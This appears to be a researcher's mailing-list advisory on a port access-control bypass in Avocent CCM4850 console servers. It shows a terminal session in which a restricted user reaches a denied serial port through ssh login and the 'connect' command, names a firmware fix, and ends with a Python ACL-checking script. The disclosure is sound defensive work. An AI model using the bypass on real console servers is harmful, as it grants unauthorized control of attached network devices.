Hi,

this is another bug I found during my research on console servers which is presumably fixed by now. So here you go:

Summary:
Port Access Control Bypass Vulnerability

Details:
Avocent's CCM console servers have a flaw which enables users to bypass access control by using ssh with standard password-based authentication.

On modern console servers you can set port permissions on a per-user basis. Research showed, however, that in this case access control failed if you ssh directly into the console server with your user account and then use the "connect" command to access the illegitimate serial port. This means that every user can access the consoles of every device hooked up. ssh'ing directly to the TCP port representing the serial port didn't show this flaw.

Vulnerable Versions:
Tested on S/W Version 2.1, CCM4850

Patches/Workarounds:
Vendor has released firmware 2.3 which, according to the vendor, fixes this problem, even though the release notes don't mention this. See:
ftp://ftp.avocent.com/public/product-upgrades/$ds1800/CCMx50%20Series/CCMx50%27s_AV_2.3/

"Exploit:"
Design flaw, exploit not needed. This is for demonstration:

TCP port 3101 is, if enabled, serial port 1. User mylocal should have access only to ports 2 through 48. Direct access to 3101/tcp is correctly denied. However, connecting to the Avocent first using the mylocal account and then using the connect command allows access to this port. In this experiment a Cisco switch is hooked up to serial port 1.

-------- snip
~/console/lab-notizen/avo|19% ssh Admin@ccm
Admin@ccm's password:
Avocent CCM4850 S/W Version 2.1
> show user
User: Admin
Level: Appliance Administrator
Access: PALL,USER,SCON,SMON,PCON,BREAK
Groups:
Port Access: BY PORT
Locked: N/A
Last Login: 00 10:17:11
Port Username Duration Socket From Socket
CLI Admin 00 00:00:04 22 0.0.0.0(58798)
> show user mylocal
User: mylocal
Level: User
Access: P2-48,BREAK
Groups:
Port Access: BY PORT
Locked: NO
Last Login: 00 08:10:24
>
>Connection to ccm closed
~/console/lab-notizen/avo|20% ssh mylocal@ccm -p 3101
mylocal@ccm's password:
Received disconnect from 192.168.100.209: 2: Access denied - No access to port 1
~/console/lab-notizen/avo|21% ssh mylocal@ccm
mylocal@ccm's password:
Avocent CCM4850 S/W Version 2.1
> connect 1
Connected to Port: 1 9600,8,N,1,NONE
cisco#Connection to ccm closed.
~/console/lab-notizen/avo|22%
-------- snap

(see also http://drwetter.org/cs-probs)

Cheers,
Dirk

--
Dr. Dirk Wetter http://drwetter.org
Consulting IT-Security + Open Source
Key fingerprint = 80A2 742B 8195 969C 5FA6 6584 8B6E 59C1 E41B 9153
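
Added example, not part of the original post and not Avocent's code: a small Python check that expands the "Access:" strings shown in the session into port sets and flags any entry path that granted a port the ACL denies, which can be rerun after a firmware upgrade. The token grammar (PALL, Pn, Pn-m) is inferred only from the two Access lines above; the 48-port count, the function names and the two extra observations are assumptions.

```python
import re

# Assumed token grammar, inferred only from the two "Access:" lines in the
# session: PALL = every port, Pn or Pn-m = one port or a range; other tokens
# (USER, SCON, BREAK, ...) are not port rights and are skipped.
PORT_TOKEN = re.compile(r"P(\d+)(?:-(\d+))?")

def allowed_ports(access, port_count=48):
    """Expand an Access string into the set of permitted serial ports."""
    ports = set()
    for token in (t.strip().upper() for t in access.split(",")):
        if token == "PALL":
            return set(range(1, port_count + 1))
        m = PORT_TOKEN.fullmatch(token)
        if m:
            low = int(m.group(1))
            high = int(m.group(2) or low)
            ports.update(p for p in range(low, high + 1) if 1 <= p <= port_count)
    return ports

def authorize(access, port, port_count=48):
    """Single decision point that every entry path has to call."""
    return port in allowed_ports(access, port_count)

def find_violations(access_by_user, observations):
    """Return observations where access was granted although the ACL denies it."""
    return [
        (user, path, port)
        for user, path, port, granted in observations
        if granted and not authorize(access_by_user[user], port)
    ]

# Constructed from the session in the post: (user, entry path, port, granted?)
ACCESS = {"Admin": "PALL,USER,SCON,SMON,PCON,BREAK", "mylocal": "P2-48,BREAK"}
OBSERVED = [
    ("mylocal", "ssh -p 3101", 1, False),  # direct TCP port: denied
    ("mylocal", "connect 1", 1, True),     # CLI connect: granted
    ("mylocal", "connect 2", 2, True),     # constructed: a permitted port
    ("Admin", "connect 1", 1, True),       # constructed: PALL covers port 1
]

if __name__ == "__main__":
    for user, path, port in find_violations(ACCESS, OBSERVED):
        print(f"ACL bypass: {user} reached port {port} via '{path}'")
```
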